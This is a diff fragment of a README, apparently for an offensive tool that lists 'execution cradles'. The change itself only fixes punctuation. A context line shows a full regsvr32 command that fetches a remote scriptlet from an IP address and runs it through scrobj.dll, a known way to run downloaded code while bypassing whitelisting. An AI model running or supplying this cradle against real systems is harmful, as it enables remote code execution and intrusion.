ad-995/shelby/README.md

 regsvr32 /s /n /u /i:http://10.10.11.58:80/sctlvjzqylbdzdl scrobj.dll
 ```

-As more Execution Cradles are added, the format will be the same.:
+As more Execution Cradles are added, the format will be the same:

 ```
 Method: